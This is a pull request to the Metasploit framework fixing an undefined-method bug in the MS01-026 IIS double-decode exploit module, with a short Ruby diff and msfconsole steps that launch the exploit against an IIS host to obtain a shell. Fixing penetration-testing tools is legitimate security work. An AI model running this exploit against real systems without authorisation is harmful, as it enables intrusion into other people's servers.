### PR TITLE
Fix #4246 - undef method 'payload_exe' error in ms01_026_dbldecode.rb

### DIFF
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -196,12 +196,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Save these file names for later deletion
     @exe_cmd_copy = exe_fname
-    @exe_payload = payload_exe
+    @exe_payload = stager_instance.payload_exe
 
     # Just for good measure, we'll make a quick, direct request for the payload
     # Using the "start" method doesn't seem to make iis very happy :(
     print_status("Triggering the payload via a direct request...")
-    mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)
+    mini_http_request({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
 
     handler
 


### PR DESCRIPTION
Fix #4246
## Root Cause

This fixes an undef method 'payload_exe' error. We broke this when all modules started using Msf::Exploit::CmdStager as the only source to get a command stager payload. The problem with that is "payload_exe" is an accessor in CmdStagerTFTP, not in CmdStager, so when the module wants to access that, we trigger the undef method error.

To be exact, this is the actual commit that broke it: 7ced5927d8807e385c0375a25ef71aef404d3036
## Verification

I don't have a Windows 2000 box anymore so I had to fix this bug without a test box. But by looking at the source and the commit history, I'm pretty sure this is the right fix.

Choose a way to verify:

**Method 1**

This is basically how I verified it as "working":
- [x] Add a `print_debug(@exe_payload.inspect)` at line 200.
- [x] Start msfconsole
- [x] `use exploit/windows/iis/ms01_026_dbldecode`
- [x] `set WINDIR C:\\Windows`
- [x] `set rhost [IP]` (Something with IIS)
- [x] `run`
- [x] The print_debug should print a random exe name. That would be the payload name.

**Method 2**

If you actually have a vulnerable IIS box for this, then you should choose this way:
- [ ] Start msfconsole
- [ ] `use exploit/windows/iis/ms01_026_dbldecode`
- [ ] `set WINDIR C:\\Windows`
- [ ] `set rhost [IP]`
- [ ] `run`
- [ ] You probably should get a shell
